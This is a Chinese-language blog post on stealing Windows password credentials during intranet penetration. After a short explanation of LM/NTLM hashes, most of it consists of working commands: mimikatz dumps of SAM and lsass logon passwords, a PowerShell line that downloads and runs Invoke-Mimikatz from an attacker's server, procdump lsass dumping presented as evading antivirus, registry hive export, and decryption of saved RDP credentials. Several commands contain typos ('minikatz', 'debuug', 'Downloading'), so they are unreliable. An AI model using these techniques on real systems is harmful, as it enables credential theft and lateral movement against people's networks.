<!DOCTYPE html><html lang="zh-CN"><head><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><meta name="author" content="Sally"><title>Windows密码凭证获取 · Sally's Blog</title><meta name="description" content="Hash简介参考链接：几种windows本地hash值获取和破解详解
Windows系统使用两种方法对用户的密码逬行哈希处理，它们分别是LAN Manager (LM)哈希和NT LANManager (NTLM)哈希.
所谓哈希(hash),就是使用一种加密函数进行计算后的结果.这个加密函数对一个"><meta name="keywords" content="Blog,博客,Hexo"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="renderer" content="webkit"><link rel="shortcut icon" type="image/x-icon" href="/images/favicon.webp"><link rel="stylesheet" href="/css/style.css"><link rel="stylesheet" href="/css/blog_basic.css"><link rel="stylesheet" href="/css/font-awesome.min.css"><link rel="stylesheet" href="/css/insight.css"><link rel="stylesheet" href="/css/search.css"><link rel="alternate" type="application/atom+xml" title="ATOM 1.0" href="/atom.xml"><script src="/js/jquery.js"></script><meta name="generator" content="Hexo 6.3.0"></head><body><div class="page-top animated fadeInDown"><div class="nav"><li> <a href="/">主页</a></li><li> <a href="/archives">归档</a></li><li> <a href="/tags">标签</a></li><li> <a href="/about">关于</a></li><li> <a href="/links">友链</a></li></div><div class="information"><div class="nav_right_btn"><li><a class="fa fa-chevron-left" onclick="window.history.go(-1)"> </a></li><li><a class="fa fa-search" onclick="openWindow();"></a></li></div><div class="avatar"><img src="/images/kabi.jpg"></div></div></div><div class="sidebar animated fadeInDown"><div class="sidebar-top"><div class="logo-title"><div class="title"><img src="/images/kabi.jpg" style="width:220px;" alt="favicon"><h3 title=""><a href="/">Sally's Blog</a></h3><div class="description"><p>A simple and beautiful blog</p></div></div><ul class="social-links"><li><a target="_blank" rel="noopener" href="https://github.com/Lhcfl"><i class="fa fa-github"></i></a></li><li><a href="mailto:yourname@example.com"><i class="fa fa-envelope"></i></a></li><li><a target="_blank" rel="noopener" href="https://zhihu.com/people/jin-xin-4-68"><i class="fa fa-mortar-board"></i></a></li></ul></div></div><div class="footer"><div class="p"> <span> 全站CC-BY-SA-3.0 </span><i class="fa fa-star"></i><span> Sally</span></div><div class="by_farbox"><span>Powered by </span><a href="https://hexo.io/zh-cn/" target="_blank">Hexo </a><span> & </span><span>Anatolo </span></div><div class="beian"></div></div></div><div class="main"><div class="autopagerize_page_element"><div class="content"><div class="post-page"><div class="post animated fadeInDown"><div class="post-title"><h3><a>Windows密码凭证获取</a></h3></div><div class="post-content"><p><p><a href="https://phoenixmerk.github.io/"><img src="https://img.shields.io/badge/%E4%BD%9C%E8%80%85-Sally-blue.svg"></a></p>
<h2 id="Hash简介"><a href="#Hash简介" class="headerlink" title="Hash简介"></a>Hash简介</h2><p>参考链接：<a target="_blank" rel="noopener" href="https://www.secpulse.com/archives/65256.html">几种windows本地hash值获取和破解详解</a></p>
<p>Windows系统使用两种方法对用户的密码逬行哈希处理，它们分别是LAN Manager (LM)哈希和NT LAN<br>Manager (NTLM)哈希.</p>
<p>所谓哈希(hash),就是使用一种加密函数进行计算后的结果.这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算，然后返回一个固定长度的字符串.</p>
<p>现在已经有了更新的NTLMv2以及Kerberos验证体系.</p>
<p>Windows加密过的密码口令，我们称之为hash, Windows的系统密码hash默认情况下TS由两部分组成：第一<br>部分是LM-hash，第二部分是NTLM-hashₒ</p>
<h2 id="Hash分类"><a href="#Hash分类" class="headerlink" title="Hash分类"></a>Hash分类</h2><table>
<thead>
<tr>
<th></th>
<th>2000</th>
<th>xp</th>
<th>2003</th>
<th>Vista</th>
<th>win7</th>
<th>2008</th>
<th>2012</th>
</tr>
</thead>
<tbody><tr>
<td>LM</td>
<td>✔</td>
<td>✔</td>
<td>✔</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>NTLM</td>
<td>✔</td>
<td>✔</td>
<td>✔</td>
<td>✔</td>
<td>✔</td>
<td>✔</td>
<td>✔</td>
</tr>
</tbody></table>
<p>LM哈希密码最大长度为14，密码长度超过14位是要用NTLM哈希。</p>
<h2 id="Hash格式"><a href="#Hash格式" class="headerlink" title="Hash格式"></a>Hash格式</h2><p>用户名RID：LM-HASH值 ：NT-HASH值</p>
<p><img src="https://merk11-cnblog.oss-cn-beijing.aliyuncs.com/blogimg/image-20230531231621682.png" alt="image-20230531231621682"></p>
<p>用户的SID值末尾的4个数字为用户的RID值</p>
<p><img src="https://merk11-cnblog.oss-cn-beijing.aliyuncs.com/blogimg/image-20230531231941199.png" alt="image-20230531231941199"></p>
<h2 id="Windows认证基础"><a href="#Windows认证基础" class="headerlink" title="Windows认证基础"></a>Windows认证基础</h2><p>本地认证：用户直接操作计算机登录</p>
<p>网络认证：远程连接到工作组的某个设备</p>
<p>域认证：登录到域环境的某个设备</p>
<h2 id="Windows本地认证"><a href="#Windows本地认证" class="headerlink" title="Windows本地认证"></a>Windows本地认证</h2><ol>
<li>用户输入密码</li>
<li>系统收到密码后将用户 输入的密码计算成NTLM Hash</li>
<li>与sam数据库（%SystemRoot%\system32\config\sam）</li>
<li>匹配则登录成功</li>
</ol>
<p>本地认证中用来处理用户输入密码的进程为Isass.exe，密码会在这个进程中明文保存，供该进程将NTLM Hash和sam数据库中的Hash及进行比对，我们使用mimikatz来获取的明文密码，就是在这个进程中读取到的。</p>
<h2 id="系统用户密码凭证获取"><a href="#系统用户密码凭证获取" class="headerlink" title="系统用户密码凭证获取"></a>系统用户密码凭证获取</h2><h3 id="minikatz"><a href="#minikatz" class="headerlink" title="minikatz"></a>minikatz</h3><p>本地非交互式凭证获取</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">minikatz.exe <span class="string">&quot;log res.txt&quot;</span> <span class="string">&quot;privilege::debuug&quot;</span> <span class="string">&quot;token::elevate&quot;</span> <span class="string">&quot;lsadump::sam&quot;</span> <span class="string">&quot;exit&quot;</span></span><br><span class="line"></span><br><span class="line">minikatz.exe <span class="string">&quot;log logon.txt&quot;</span> <span class="string">&quot;privilege::debug&quot;</span> <span class="string">&quot;sekurlsa::logonpasswords&quot;</span> <span class="string">&quot;exit&quot;</span></span><br></pre></td></tr></table></figure>

<p>这里展示获取Hash值方法</p>
<p>首先进入privilege::debug进行提权</p>
<p><img src="https://merk11-cnblog.oss-cn-beijing.aliyuncs.com/blogimg/image-20230601105005647.png" alt="image-20230601105005647"></p>
<p>接着进行token模拟，运行token::elevate可以将权限提到system</p>
<p><img src="https://merk11-cnblog.oss-cn-beijing.aliyuncs.com/blogimg/image-20230601105206455.png" alt="image-20230601105206455"></p>
<p>然后使用lsdump::sam把sam数据库中的值dump下来，可以获取用户hash值</p>
<p><img src="https://merk11-cnblog.oss-cn-beijing.aliyuncs.com/blogimg/image-20230601104739059.png" alt="image-20230601104739059"></p>
<p>最后登录md5解密网站进行解密</p>
<p><img src="https://merk11-cnblog.oss-cn-beijing.aliyuncs.com/blogimg/image-20230601104838766.png" alt="image-20230601104838766"></p>
<p>如果解密不出来，据说可以利用这个hash值进行域内的横向移动。</p>
<h3 id="powershell"><a href="#powershell" class="headerlink" title="powershell"></a>powershell</h3><p>powershell远程加载mimikatz脚本</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">powershell IEX (New-Object Net.webClient).Downloading(&#x27;你的vps中脚本下载地址&#x27;);Invoke-Mimikatz-DumpCreds</span><br></pre></td></tr></table></figure>

<h3 id="Pwddump7"><a href="#Pwddump7" class="headerlink" title="Pwddump7"></a>Pwddump7</h3><p>这款工具也可以读取当前系统的各个用户的密码hash</p>
<p>在命令行输入</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Pwddump7.exe &gt; pass.txt</span><br></pre></td></tr></table></figure>

<h3 id="Ophcrack"><a href="#Ophcrack" class="headerlink" title="Ophcrack"></a>Ophcrack</h3><p>配合彩虹表进行口令破解</p>
<p>工具下载：</p>
<p><a target="_blank" rel="noopener" href="https://ophcrack.sourceforge.io/">https://ophcrack.sourceforge.io/</a></p>
<p>彩虹表：</p>
<p><a target="_blank" rel="noopener" href="https://ophcrack.sourceforge.io/tables.php">https://ophcrack.sourceforge.io/tables.php</a></p>
<p><a target="_blank" rel="noopener" href="http://project-rainbowcrack.com/table.htm">http://project-rainbowcrack.com/table.htm</a></p>
<h3 id="Procdump-Mimikatz（比较常用）"><a href="#Procdump-Mimikatz（比较常用）" class="headerlink" title="Procdump+Mimikatz（比较常用）"></a>Procdump+Mimikatz（比较常用）</h3><p>这个是微软的工具，经过微软认证，所以杀软比较不会识别</p>
<p>工具下载：</p>
<p><a target="_blank" rel="noopener" href="https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump">https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump</a></p>
<p>Procdump lsass 进程导出：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">x86：procdump.exe -accepteula -ma lsass.exe lsass.dmp</span><br><span class="line">x64：procdump.exe -accepteula -64  -ma lsass.exe lsass.dmp</span><br></pre></td></tr></table></figure>

<p>然后用mimikatz还原密码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sekurlsa::minidump lsass.dmp</span><br><span class="line">sekurlsa::logonPasswords full</span><br></pre></td></tr></table></figure>

<h3 id="minikatz免杀方法"><a href="#minikatz免杀方法" class="headerlink" title="minikatz免杀方法"></a>minikatz免杀方法</h3><p>参考链接：<a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/system/234365.html">https://www.freebuf.com/articles/system/234365.html</a></p>
<h3 id="注册表导出Hash"><a href="#注册表导出Hash" class="headerlink" title="注册表导出Hash"></a>注册表导出Hash</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">reg save HKLM\SYSTEM system.hiv</span><br><span class="line">reg save HKLM\SAM sam.hiv</span><br><span class="line">reg save HKLM\SECURITY security.hiv</span><br></pre></td></tr></table></figure>

<p>导出后可以使用cain导入system.hiv、security.hiv获取缓存中的明文信息</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz.exe &quot;lsadump::sam /system:system.hiv /sam:sam.hiv&quot; eixt</span><br></pre></td></tr></table></figure>

<h3 id="meterpreter获取Hash"><a href="#meterpreter获取Hash" class="headerlink" title="meterpreter获取Hash"></a>meterpreter获取Hash</h3><p>meterpreter集成了minikatz模块</p>
<p>使用命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">load minikatz </span><br><span class="line">msv 获取明文密码</span><br><span class="line">kerberos 获取明文密码</span><br></pre></td></tr></table></figure>

<p>以及其他命令，不作详述。</p>
<h3 id="cobaltstrike获取Hash"><a href="#cobaltstrike获取Hash" class="headerlink" title="cobaltstrike获取Hash"></a>cobaltstrike获取Hash</h3><p>cobaltstrike也能够在监听器中使用mimikatz</p>
<h2 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h2><h3 id="Powershell脚本获取RDP记录"><a href="#Powershell脚本获取RDP记录" class="headerlink" title="Powershell脚本获取RDP记录"></a>Powershell脚本获取RDP记录</h3><p>参考：<a target="_blank" rel="noopener" href="https://github.com/3gstudent/List-RDP-Connections-History.git">https://github.com/3gstudent/List-RDP-Connections-History.git</a></p>
<p>可以获取RDP连接记录</p>
<h3 id="本地RDP连接密码解密"><a href="#本地RDP连接密码解密" class="headerlink" title="本地RDP连接密码解密"></a>本地RDP连接密码解密</h3><p>查看连接记录</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">reg query &quot;HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers&quot; /s</span><br></pre></td></tr></table></figure>

<p>查看是否有密码文件</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*</span><br></pre></td></tr></table></figure>

<p>查看保存在本地的远程主机信息</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cmdkey /list</span><br></pre></td></tr></table></figure>

<p>mimikatz解密</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">提权</span><br><span class="line">privilege::debug</span><br><span class="line">可以得到guidMasterkey，记录这个值</span><br><span class="line">dpapi::cred</span><br><span class="line">/in:[指定需要解密的文件的路径]  </span><br><span class="line">得到MasterKey</span><br><span class="line">sekurlsa::dpapi</span><br><span class="line">解密得到口令</span><br><span class="line">dpapi::cred /masterkey:[刚才获取的masterkey值]</span><br></pre></td></tr></table></figure>

<h3 id="PPTP口令获取"><a href="#PPTP口令获取" class="headerlink" title="PPTP口令获取"></a>PPTP口令获取</h3><p>PPTP点对点隧道协议，可以使远程用户拨入ISP访问企业内网。</p>
<p>在渗透测试中，获取了PPTP口令，就可以登录内网进行进一步渗透。</p>
<p>需要得到管理员权限。</p>
<h3 id="Mysql数据库密码破解"><a href="#Mysql数据库密码破解" class="headerlink" title="Mysql数据库密码破解"></a>Mysql数据库密码破解</h3><p>与用户相关的三个文件是user.frm、user.MYD\USER.myi,Mysql数据库用户名密码都保存在user.MYD中。</p>
<p>加密方式：</p>
<p>Mysql4.1之前是Mysql323加密</p>
<p>Mysql4.1之后是MysqlSHA1加密</p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>这里列举了一些比较常见的密码凭证获取的方法，可以发现密码凭证大多数都是使用Hash值进行存储，破解其实也比较困难，主要是采用彩虹表，但也不排除有些密码凭证是以明文方式存储的。总而言之，方法总比困难多。</p>
</p><div class="tip">本文采用CC-BY-SA-3.0协议，转载请注明出处<br>Author: Sally</div></div><div class="post-footer"><div class="meta"><div class="info"><i class="fa fa-sun-o"></i><span class="date">2023-06-01</span><i class="fa fa-tag"></i><a class="tag" href="/tags/内网渗透/" title="内网渗透">内网渗透 </a><span class="leancloud_visitors"></span><span>About 1327 words, 4 min 25 sec  read</span></div></div></div></div><div class="share"><div class="evernote"><a class="fa fa-bookmark" href="" onclick="javascript:join_favorite()" ref="sidebar"></a></div><div class="weibo"><a class="fa fa-weibo" href="javascript:void((function(s,d,e){try{}catch(e){}var f='http://service.weibo.com/share/share.php?',u=d.location.href,p=['url=',e(u),'&amp;title=',e(d.title),'&amp;appkey=2924220432'].join('');function a(){if(!window.open([f,p].join(''),'mb',['toolbar=0,status=0,resizable=1,width=620,height=450,left=',(s.width-620)/2,',top=',(s.height-450)/2].join('')))u.href=[f,p].join('');};if(/Firefox/.test(navigator.userAgent)){setTimeout(a,0)}else{a()}})(screen,document,encodeURIComponent));"></a></div><div class="twitter"><a class="fa fa-twitter" target="_blank" rel="noopener" href="http://twitter.com/home?status=,https://phoenixmerk.github.io/2023/06/01/Windows密码凭证获取/,Sally's Blog,Windows密码凭证获取,;"></a></div></div><div class="pagination"><ul class="clearfix"><li class="pre pagbuttons"><a class="btn" role="navigation" href="/2023/06/02/Windows%E6%96%87%E4%BB%B6%E4%BC%A0%E8%BE%93/" title="Windows文件传输">Previous</a></li><li class="next pagbuttons"><a class="btn" role="navigation" href="/2023/05/31/cobaltstrike/" title="cobaltstrike">Next</a></li></ul></div><script src="/js/visitors.js"></script></div></div></div></div><script src="/js/jquery-migrate-1.2.1.min.js"></script><script src="/js/jquery.appear.js"></script><script src="/js/add-bookmark.js"></script><script>(function(window){var INSIGHT_CONFIG={TRANSLATION:{POSTS:"Posts",PAGES:"Pages",CATEGORIES:"Categories",TAGS:"Tags",UNTITLED:"(Untitled)",},CONTENT_URL:"/content.json",};window.INSIGHT_CONFIG=INSIGHT_CONFIG})(window);</script><script src="/js/insight.js" defer></script><div class="searchbox ins-search"><div class="searchbox-container ins-search-container"><div class="searchbox-input-wrapper"><input class="searchbox-input ins-search-input" type="text" placeholder="Search..."><span class="searchbox-close"><a class="fa fa-times-circle" onclick="closeWindow();"></a></span></div><div class="searchbox-result-wrapper ins-section-wrapper"><div class="ins-section-container"><p>Seraching...</p></div></div></div></div><script src="/js/baidu-tongji.js"></script></body></html>